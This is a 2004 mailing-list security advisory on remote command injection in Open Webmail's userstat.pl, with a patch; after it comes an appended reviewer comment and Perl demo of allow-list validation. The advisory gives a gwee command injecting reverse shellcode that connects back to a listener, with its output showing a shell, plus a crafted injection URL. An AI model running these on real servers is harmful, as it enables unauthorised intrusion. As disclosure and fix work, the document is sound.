From michel@cycom.se Sun May 9 21:33:20 2004 
From: Michel Blomgren
To: full-disclosure@lists.netsys.com
Date: Mon, 10 May 2004 01:28:41 +0200
Subject: [Full-Disclosure] CSA-200402-1: Previous Open Webmail vulnerability is exploitable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cycom AB Security Advisory CSA-200402-1
www.cycom.se

Advisory: Previous Open Webmail vulnerability is exploitable
Date: Sat Feb 21 15:18:21 CET 2004, updated: Thu May 6 10:37:29 CEST 2004
Application: Open Webmail 2.20, 2.21 and 2.30 (and -current)
Vulnerability: Remote arbitrary command execution
Availability: http://openwebmail.org
Platforms: OS independent (multiple *NIXes)
Status: Patch is available (included in this advisory)
Reference: CSA-200402-1
Author: Michel Blomgren

SYNOPSIS

"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail." -- http://openwebmail.org

VULNERABILITY

Nullbyte and Syscalls discovered that a near-obsolete script named userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't filter out dangerous *nix shell characters from the "loginname" parameter. The "loginname" parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to an HTTP GET, HEAD or POST request, an attacker can execute arbitrary system commands as an unprivileged user (e.g. the Apache user, "nobody" or "www").

DISCOVERY

The vulnerability was found by Nullbyte and Syscalls of UDC.

EXPLOIT

At least 2 exploits are in circulation, one by Nullbyte and one re-write by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is limited (read the "FIX" section below).
You can use Gwee (generic web exploitation engine), available from http://cycom.se/dl/gwee, to exploit using the following command:

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl

-L  Use built-in TCP listener (like "nc -l").
-l  The host or IP address to have the reverse shellcode connect back to.
-p  The port to have the reverse shellcode connect back to.

For example...

$ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi

        !!!
      ` ___ '
     - (0 0) -
- -----oOo(_)oOo---------------------------------------- ----- --- -- - -
gwee 1.21 - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren
Perl and Python shellcode by Sabu
Acknowledgements: Sabu and Nullbyte

[i] target: localhost
[i] using POST requests to send data
[i] shellcode: Sabu's reverse Perl shellcode (portable)
[i] injection method: perl -e
[+] resolving localhost into an ip address
[i] shellcode will connect to 127.0.0.1 on port 12345
[i] will listen for incoming connection on port 12345
[+] attempting to inject shellcode into target
[+] listening for incoming connection on port 12345, timeout is 30 seconds
[i] got connection from 127.0.0.1:33670
Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown
 12:05:52 up 3:56, 7 users, load average: 0.08, 0.02, 0.01

FIX

Cycom AB has provided a diff patch that will fix the issue. Ken Girrard wrote and published an advisory long before this one. He provided a patch with his advisory which results in userstat.pl still being vulnerable to remote arbitrary command execution; this patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30 (5.8MB). Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter out spaces and tabs, which makes it impossible to pass arguments to commands an attacker would want to execute. Nevertheless, it's still possible to execute commands without arguments.
An example of such an attack would be an attacker that has write access to the box (using e.g. FTP), uploads a reverse shellcode, marks it executable and enters the absolute path to it in a crafted URL such as:

http://target/cgi-bin/openwebmail/userstat.pl&loginname=%7C/home/fu/bar

Our patch follows...

- ----
- --- userstat.pl.orig	2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl	2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
 my $html=qq||.
         qq|_TEXT_|;
 
+# filter out dangerous characters
+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+
 if ($user ne "") {
    my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
    if ($status =~ /has no mail/) {
- ----

Enter cgi-bin/openwebmail/ and run:

$ patch -i owm.patch

ACKNOWLEDGMENTS

I would like to thank the following people: Sabu, Nullbyte and Syscalls.

ABOUT CYCOM AB

Cycom AB is a newly started firm specializing in information security services (penetration testing, risk assessment, source code review, disaster/incident management and education). Visit us at www.cycom.se.

- -- 
Michel Blomgren
Cycom AB
http://www.cycom.se
______________________________________________
PGP: http://www.cycom.se/misc/pubkeymichel.asc
886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQFAnr6po/EpQxAcGPoRAudxAJ981KZ3PAq1mTH2Fbcbnu1ZvlvzAACfdV0h
0fzjuRdQkaua1yEJptqFyU4=
=tY6l
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
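Review bot: the added substitution in the userstat.pl hunk is a deny-list that rewrites $user rather than rejecting it, so a tampered "loginname" such as "bob|/home/fu/bar" is silently turned into a different, well-formed name ("bobhomefubar") and then still interpolated into `my $status=\`$ow_cgidir/openwebmail-tool.pl -m -e $user\`;`, which goes through /bin/sh; characters outside the class, for instance "*" and "?", still reach the shell and are subject to glob expansion. Suggest checking $user against an allow-list of login-name characters and failing closed (an error page or die) when it does not match, and invoking openwebmail-tool.pl through the list form of open() or system() so that no shell parses the argument at all; the list-form call also makes the exact contents of the character class irrelevant for command injection.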
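The Perl script below is an added example; it is not code from the advisory or from the Open Webmail project. It applies the character-stripping substitution from the patch above to the two injection shapes the advisory describes (";" followed by a command, "|" followed by an absolute path), contrasts it with an allow-list check that rejects instead of rewrites, and shows how the helper can be started through the list form of open() so that metacharacters in "loginname" are never interpreted by a shell. The function names, the allow-list character class and the use of /bin/echo as a stand-in for openwebmail-tool.pl are assumptions for this demo.

```perl
#!/usr/bin/perl
# Added example: three ways of handling the "loginname" parameter before it
# reaches openwebmail-tool.pl. Not part of the advisory or of Open Webmail.
use strict;
use warnings;

# 1. Deny-list: the exact substitution from the Cycom patch. It strips the
#    listed characters and returns whatever is left.
sub strip_metachars {
    my ($user) = @_;
    $user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
    return $user;
}

# 2. Allow-list: accept only a conservative login-name alphabet and reject
#    everything else. The character class is an assumption; adjust it to the
#    site's naming policy. Rejecting, rather than stripping, means a tampered
#    parameter can never collapse into some other user's valid login name.
sub valid_loginname {
    my ($user) = @_;
    return defined($user) && $user =~ /\A[a-z0-9][a-z0-9._-]{0,31}\z/ ? 1 : 0;
}

# 3. No shell: the list form of open() hands the arguments straight to
#    execvp(), so ";", "|" and friends are just bytes inside one argv element.
#    The advisory's original call is `$ow_cgidir/openwebmail-tool.pl -m -e $user`
#    in backticks, which goes through /bin/sh. $tool is a parameter here so the
#    demo can use /bin/echo as a stand-in (assumption).
sub run_tool {
    my ($tool, $user) = @_;
    die "invalid loginname\n" unless valid_loginname($user);
    open(my $fh, '-|', $tool, '-m', '-e', $user)
        or die "cannot run $tool: $!\n";
    my $status = do { local $/; <$fh> };
    close($fh);
    return $status;
}

# Constructed sample inputs: a normal login name and the two injection
# shapes the advisory describes.
my @samples = ('alice', 'alice;/home/fu/bar', 'bob|/home/fu/bar');
for my $s (@samples) {
    # Note that the stripped results are themselves well-formed names:
    # stripping changes *who* is looked up, it does not flag the tampering.
    printf "%-20s strip => %-16s allow-list => %s\n",
        $s, strip_metachars($s), valid_loginname($s) ? 'accept' : 'reject';
}

# With /bin/echo standing in for openwebmail-tool.pl, the accepted name
# arrives as a single argument; the tampered one is refused before any
# process is started.
print run_tool('/bin/echo', 'alice');
for my $s ('bob|/home/fu/bar') {
    my $out = eval { run_tool('/bin/echo', $s) };
    print "rejected: $s: $@" if $@;
}
```

The deny-list is kept only to show what the patch does to the inputs; in a fix you would keep the allow-list check and the list-form invocation, which together remove both the silent rewriting and the shell from the path between the CGI parameter and the tool.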